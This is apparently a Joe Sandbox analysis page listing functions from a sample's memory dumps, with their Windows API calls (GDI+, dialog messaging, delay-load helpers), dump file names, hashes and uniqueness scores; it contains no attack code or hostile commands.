Function 00729D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00729D81

Part of subcall function 00729B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00729B30

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction ID: a20a1a9f6b76ef452795f10b095fc9e0c57cbe355cb61a27c9659c5945a10b06
Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction Fuzzy Hash: BBD0A73031421CFAEF40BA70AC06A7E7BA8EB00300F044035BD0886141ED75DF10B261

Uniqueness

Uniqueness Score: -1.00%

Function 00719989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00719887), ref: 00719995

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 57705fd30df5bef6d9068f5da45736cd4abf925b8805f703c38271b367809112
Instruction ID: 97c0c076e0babb06916d245dde4e02d9ca5c8f7279cb98244a2f488d198d8cfc
Opcode Fuzzy Hash: 57705fd30df5bef6d9068f5da45736cd4abf925b8805f703c38271b367809112
Instruction Fuzzy Hash: 69D01231011140968F21463C4D190D97752DBC3366B38C7E8D165C80F1D72BD883F542

Uniqueness

Uniqueness Score: -1.00%

Function 0072D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0072D43F

Part of subcall function 0072AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0072AC85
Part of subcall function 0072AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0072AC96
Part of subcall function 0072AC74: IsDialogMessageW.USER32(00010472,?), ref: 0072ACAA
Part of subcall function 0072AC74: TranslateMessage.USER32(?), ref: 0072ACB8
Part of subcall function 0072AC74: DispatchMessageW.USER32(?), ref: 0072ACC2

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 4827780a2fda408064a47a47d533b2d226f04814d9f75d53273111064571c577
Instruction ID: c738c88836bdccd11ceebe7f4c8656192971371cc060abac20c2b08cb2aac251
Opcode Fuzzy Hash: 4827780a2fda408064a47a47d533b2d226f04814d9f75d53273111064571c577
Instruction Fuzzy Hash: 63D09E31144300BBD6112B51DE07F0F7AA6BB88B05F408654B748740F28A7A9D619B1A

Uniqueness

Uniqueness Score: -1.00%

Function 0072D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 45cd1ce8ac9ffdec5c154e1655667f54f37834f4ce3f25fcef95f5ebdeed7106
Instruction ID: 042e814f6a1dcdba975c43c70301e29f377c16db24e985a0f82862b90cfd9cf2
Opcode Fuzzy Hash: 45cd1ce8ac9ffdec5c154e1655667f54f37834f4ce3f25fcef95f5ebdeed7106
Instruction Fuzzy Hash: 7DB012E176C011AC311C61087E06D36021CC4C0B10330803AB41DD01C1E64CAF060831

Uniqueness

Uniqueness Score: -1.00%

Function 0072D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 966ce6ffc96b14d8f57d2cf7d65b34eead0c2c7bee81acfa68296c4bf8059bdd
Instruction ID: 152d11f8ddc9fb71e9e028f9d928a4b13b5befc85fafc1be6eef0f54153378cd
Opcode Fuzzy Hash: 966ce6ffc96b14d8f57d2cf7d65b34eead0c2c7bee81acfa68296c4bf8059bdd
Instruction Fuzzy Hash: 70B012E176C011AC311C61097D06D36031CD4C0B10330802AB41DD01C1E64CAE050831

Uniqueness

Uniqueness Score: -1.00%

Function 0072D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: adade69ea39a83fd7ea23a9508d90f959cc90d8ab312967bcd7096cd4f7b10a5
Instruction ID: 79fda644e633d988575526dacb724b907439c0f5c4a93cb4488de722b7f2a6d0
Opcode Fuzzy Hash: adade69ea39a83fd7ea23a9508d90f959cc90d8ab312967bcd7096cd4f7b10a5
Instruction Fuzzy Hash: 9CB012E176C111AC315861087D06D36021CC4C0B10330812AB41DD01C1E64CAE450831

Uniqueness

Uniqueness Score: -1.00%

Function 0072D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9d9739c03264dc1416230f85afa6ce9fa12b87555497b614756b1b6d62f4effa
Instruction ID: fbddfbb30cd3bf4e33b5aaea8fcdef874bb2f8d2c90b14ed55f74b321d047bb8
Opcode Fuzzy Hash: 9d9739c03264dc1416230f85afa6ce9fa12b87555497b614756b1b6d62f4effa
Instruction Fuzzy Hash: 49B012E176C011AC311861087D06D36021CC4C1B10330C02AB81DD01C1E64CAE054831

Uniqueness

Uniqueness Score: -1.00%

Function 0072D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ff4605736cd4eeb625639b56b29d13424dff0f2d707516040baaf3e14603ba1d
Instruction ID: f2ef5e8b83f9ea738bf522131e83fba9eb7a7f523f588e0b25873a03a12fbf0f
Opcode Fuzzy Hash: ff4605736cd4eeb625639b56b29d13424dff0f2d707516040baaf3e14603ba1d
Instruction Fuzzy Hash: 7BB012D176C111AC3158610D7D06D36021CC4C0B10330C16AB41DD02C1D64CAD8A0831

Uniqueness

Uniqueness Score: -1.00%

Function 0072D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 66512e6966ec69eacd620ed6622c4b65d9bc947b8b68733fd129ef6104340e3b
Instruction ID: 8c7328356275cc672e9981bdee8a06f945fb1a9a3cc5c3415b511afe556fa224
Opcode Fuzzy Hash: 66512e6966ec69eacd620ed6622c4b65d9bc947b8b68733fd129ef6104340e3b
Instruction Fuzzy Hash: 3CB012D176C011AC311C610D7E06D36021CC4C0B10330C07AB41DD02C1D64CAE0F0831

Uniqueness

Uniqueness Score: -1.00%

Function 0072D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a11fb94265b2100513cf0a183ea71da06368d2aed09a2dedb367863de82854ff
Instruction ID: 02902c4bca723b55b46c03b46e647beaffc23293776dc561294bdb0224fb26a1
Opcode Fuzzy Hash: a11fb94265b2100513cf0a183ea71da06368d2aed09a2dedb367863de82854ff
Instruction Fuzzy Hash: 03B012D176C011AC3118610D7D06D36021CC4C1B10330C06AB81DD02C1D64CAD0A4831

Uniqueness

Uniqueness Score: -1.00%

Function 0072D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 068066f9466ae77f24fe44a2abde224dd28a905cf00e83d0c5ee12c0bfdc33b1
Instruction ID: 0afc7ea87416a47683fa7d6317b29c03e8680871658c6c06e9bfff52458e36f0
Opcode Fuzzy Hash: 068066f9466ae77f24fe44a2abde224dd28a905cf00e83d0c5ee12c0bfdc33b1
Instruction Fuzzy Hash: 5BB012D576C115AC311861087D46D3B031CE4C0B10330802AB41DD01C1DA4CAD050935

Uniqueness

Uniqueness Score: -1.00%

Function 0072D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b7f3f6ec0e805a9c7cce16924e7239a4f330a633933bf7c1d5efa9ecfe49e64c
Instruction ID: c819736a0d391df608be17fb3956dc9e0d8a4383c0c49d7f9ce12d1946569456
Opcode Fuzzy Hash: b7f3f6ec0e805a9c7cce16924e7239a4f330a633933bf7c1d5efa9ecfe49e64c
Instruction Fuzzy Hash: 6DB012D576C311FC351821047D56C3B021CC4C0B10330857AB41DE00C1DA4CAD494835

Uniqueness

Uniqueness Score: -1.00%

Function 0072D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a66965f646e384b734abee794fe2af956711372b56941b2c233fd7d594aa76a3
Instruction ID: 869a93604c6f5abc61a54f45ed02478af415fbecc59bd50c440530fe22c6d462
Opcode Fuzzy Hash: a66965f646e384b734abee794fe2af956711372b56941b2c233fd7d594aa76a3
Instruction Fuzzy Hash: 2DB012E176C011EC311C61087E06D3602DCC4C0B10330803AB41DD01C1D64CAE060831

Uniqueness

Uniqueness Score: -1.00%

Function 0072D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f6484ae545c215be44e591389c2c8130a2e1084ecd9d3b8bbecc994298ec52e2
Instruction ID: fe3dc648b5b0bb2cc4df7ca3309d30de839f9d45a3364a203ec07504df272e62
Opcode Fuzzy Hash: f6484ae545c215be44e591389c2c8130a2e1084ecd9d3b8bbecc994298ec52e2
Instruction Fuzzy Hash: 57B012D177D011AC311861087D06D36035ED8C0B10330802AB41DD01C2D64CAD050831

Uniqueness

Uniqueness Score: -1.00%

Function 0072D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0dcac485e041a0fe6d0a54db3b43c0a85f6231b6cc6f6a2a506c7dee84c77b32
Instruction ID: 2cf27ecb89b923ee037ca2b4660d531d1c44780e34d20777462d732e87acaca2
Opcode Fuzzy Hash: 0dcac485e041a0fe6d0a54db3b43c0a85f6231b6cc6f6a2a506c7dee84c77b32
Instruction Fuzzy Hash: 14B012D176C011EC311861187D06D36029CC4C1B10330C02AB91DD01C1D74CAD054831

Uniqueness

Uniqueness Score: -1.00%

Function 0072D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6a6a80b48308b7b5fc611aa1c446d342d9d5bde792466e35e8ebad0d6b62b229
Instruction ID: 718e2943a8ea0a200e907545f13250c0b51d75d88c986b65b7d09d0764b08c1b
Opcode Fuzzy Hash: 6a6a80b48308b7b5fc611aa1c446d342d9d5bde792466e35e8ebad0d6b62b229
Instruction Fuzzy Hash: 06B012E176D111AC315862087D06D36021EC4C0B10730812AB41DD01C2D64CAD450831

Uniqueness

Uniqueness Score: -1.00%

Function 0072D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
